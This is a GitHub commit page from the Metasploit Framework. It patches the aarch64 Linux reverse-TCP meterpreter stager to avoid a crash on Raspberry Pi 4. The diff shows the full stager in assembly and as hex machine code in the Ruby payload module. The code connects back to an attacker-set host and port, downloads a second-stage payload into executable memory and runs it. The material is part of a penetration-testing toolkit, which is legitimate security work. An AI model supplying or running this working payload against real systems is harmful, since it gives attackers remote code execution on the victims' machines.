Skip to content

Commit c7d59ce

Browse files
bwatters-r7bwatters-r7
authored
Merge pull request rapid7#19875 from dledda-r7/fix/aarch64-sigill-raspberrypi
Fix SIGILL on staged meterpreter on RaspberryPi4
2 parents 0b0b9bb + cdac135 commit c7d59ce

File tree

2 files changed

+64
-56
lines changed

2 files changed

+64
-56
lines changed

external/source/shellcode/linux/aarch64/stager_sock_reverse.s

Lines changed: 4 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -77,6 +77,10 @@ read_loop:
7777
svc 0
7878
cmn x0, #0x1
7979
beq failed
80+
mov x2, x0 // The 'sync' syscall was added to fix a strange bug in RaspberryPi 4
81+
mov x8, #0x51 // More information here:
82+
svc 0 // https://github.com/rapid7/metasploit-framework/pull/19875
83+
mov x0, x2 //
8084
add x3, x3, x0
8185
subs x4, x4, x0
8286
bne read_loop

modules/payloads/stagers/linux/aarch64/reverse_tcp.rb

Lines changed: 60 additions & 56 deletions
Original file line numberDiff line numberDiff line change
@@ -15,7 +15,7 @@
1515
###
1616
module MetasploitModule
1717

18-
CachedSize = 212
18+
CachedSize = 228
1919

2020
include Msf::Payload::Linux::Aarch64::Prepends
2121
include Msf::Payload::Stager
@@ -32,65 +32,69 @@ def initialize(info = {})
3232
{
3333
'Offsets' =>
3434
{
35-
'LPORT' => [ 206, 'n' ],
36-
'LHOST' => [ 208, 'ADDR' ],
35+
'LPORT' => [ 222, 'n' ],
36+
'LHOST' => [ 224, 'ADDR' ],
3737
},
3838
'Payload' =>
3939
[
4040
# Generated from external/source/shellcode/linux/aarch64/stager_sock_reverse.s
41-
0xd2800040, # mov x0, #0x2 // #2
42-
0xd2800021, # mov x1, #0x1 // #1
43-
0xd2800002, # mov x2, #0x0 // #0
44-
0xd28018c8, # mov x8, #0xc6 // #198
45-
0xd4000001, # svc #0x0
46-
0xaa0003ec, # mov x12, x0
47-
0x100005a1, # adr x1, cc <sockaddr>
48-
0xd2800202, # mov x2, #0x10 // #16
49-
0xd2801968, # mov x8, #0xcb // #203
50-
0xd4000001, # svc #0x0
51-
0x350004c0, # cbnz w0, c0 <failed>
52-
0xaa0c03e0, # mov x0, x12
53-
0xd10043ff, # sub sp, sp, #0x10
54-
0x910003e1, # mov x1, sp
55-
0xd2800082, # mov x2, #0x4 // #4
56-
0xd28007e8, # mov x8, #0x3f // #63
57-
0xd4000001, # svc #0x0
58-
0xb100041f, # cmn x0, #0x1
59-
0x540003c0, # b.eq c0 <failed>
60-
0xb94003e2, # ldr w2, [sp]
61-
0xd34cfc42, # lsr x2, x2, #12
62-
0x91000442, # add x2, x2, #0x1
63-
0xd374cc42, # lsl x2, x2, #12
64-
0xaa1f03e0, # mov x0, xzr
65-
0xaa0203e1, # mov x1, x2
66-
0xd28000e2, # mov x2, #0x7 // #7
67-
0xd2800443, # mov x3, #0x22 // #34
68-
0xaa1f03e4, # mov x4, xzr
69-
0xaa1f03e5, # mov x5, xzr
70-
0xd2801bc8, # mov x8, #0xde // #222
71-
0xd4000001, # svc #0x0
72-
0xb100041f, # cmn x0, #0x1
73-
0x54000200, # b.eq c0 <failed>
74-
0xb94003e4, # ldr w4, [sp]
75-
0xf90003e0, # str x0, [sp]
76-
0xaa0003e3, # mov x3, x0
77-
0xaa0c03e0, # mov x0, x12
78-
0xaa0303e1, # mov x1, x3
79-
0xaa0403e2, # mov x2, x4
80-
0xd28007e8, # mov x8, #0x3f // #63
81-
0xd4000001, # svc #0x0
82-
0xb100041f, # cmn x0, #0x1
83-
0x540000c0, # b.eq c0 <failed>
84-
0x8b000063, # add x3, x3, x0
85-
0xeb000084, # subs x4, x4, x0
86-
0x54fffee1, # b.ne 90 <read_loop>
87-
0xf94003e0, # ldr x0, [sp]
88-
0xd63f0000, # blr x0
89-
0xd2800000, # mov x0, #0x0 // #0
90-
0xd2800ba8, # mov x8, #0x5d // #93
91-
0xd4000001, # svc #0x0
92-
0x5c110002, # .word 0x5c110002
93-
0x0100007f, # .word 0x0100007f
41+
0xd2800040, # mov x0, #0x2 // #2
42+
0xd2800021, # mov x1, #0x1 // #1
43+
0xd2800002, # mov x2, #0x0 // #0
44+
0xd28018c8, # mov x8, #0xc6 // #198
45+
0xd4000001, # svc #0x0
46+
0xaa0003ec, # mov x12, x0
47+
0x10000621, # adr x1, dc <sockaddr>
48+
0xd2800202, # mov x2, #0x10 // #16
49+
0xd2801968, # mov x8, #0xcb // #203
50+
0xd4000001, # svc #0x0
51+
0x35000540, # cbnz w0, d0 <failed>
52+
0xaa0c03e0, # mov x0, x12
53+
0xd10043ff, # sub sp, sp, #0x10
54+
0x910003e1, # mov x1, sp
55+
0xd2800082, # mov x2, #0x4 // #4
56+
0xd28007e8, # mov x8, #0x3f // #63
57+
0xd4000001, # svc #0x0
58+
0xb100041f, # cmn x0, #0x1
59+
0x54000440, # b.eq d0 <failed> // b.none
60+
0xb94003e2, # ldr w2, [sp]
61+
0xd34cfc42, # lsr x2, x2, #12
62+
0x91000442, # add x2, x2, #0x1
63+
0xd374cc42, # lsl x2, x2, #12
64+
0xaa1f03e0, # mov x0, xzr
65+
0xaa0203e1, # mov x1, x2
66+
0xd28000e2, # mov x2, #0x7 // #7
67+
0xd2800443, # mov x3, #0x22 // #34
68+
0xaa1f03e4, # mov x4, xzr
69+
0xaa1f03e5, # mov x5, xzr
70+
0xd2801bc8, # mov x8, #0xde // #222
71+
0xd4000001, # svc #0x0
72+
0xb100041f, # cmn x0, #0x1
73+
0x54000280, # b.eq d0 <failed> // b.none
74+
0xb94003e4, # ldr w4, [sp]
75+
0xf90003e0, # str x0, [sp]
76+
0xaa0003e3, # mov x3, x0
77+
0xaa0c03e0, # mov x0, x12
78+
0xaa0303e1, # mov x1, x3
79+
0xaa0403e2, # mov x2, x4
80+
0xd28007e8, # mov x8, #0x3f // #63
81+
0xd4000001, # svc #0x0
82+
0xb100041f, # cmn x0, #0x1
83+
0x54000140, # b.eq d0 <failed> // b.none
84+
0xaa0003e2, # mov x2, x0
85+
0xd2800a28, # mov x8, #0x51 // #81
86+
0xd4000001, # svc #0x0
87+
0xaa0203e0, # mov x0, x2
88+
0x8b000063, # add x3, x3, x0
89+
0xeb000084, # subs x4, x4, x0
90+
0x54fffe61, # b.ne 90 <read_loop> // b.any
91+
0xf94003e0, # ldr x0, [sp]
92+
0xd63f0000, # blr x0
93+
0xd2800000, # mov x0, #0x0 // #0
94+
0xd2800ba8, # mov x8, #0x5d // #93
95+
0xd4000001, # svc #0x0
96+
0x5c110002, # .short 0x5c110002
97+
0x0100007f # .word 0x0100007f
9498
].pack("V*")
9599
}
96100
))

0 commit comments

Comments
 (0)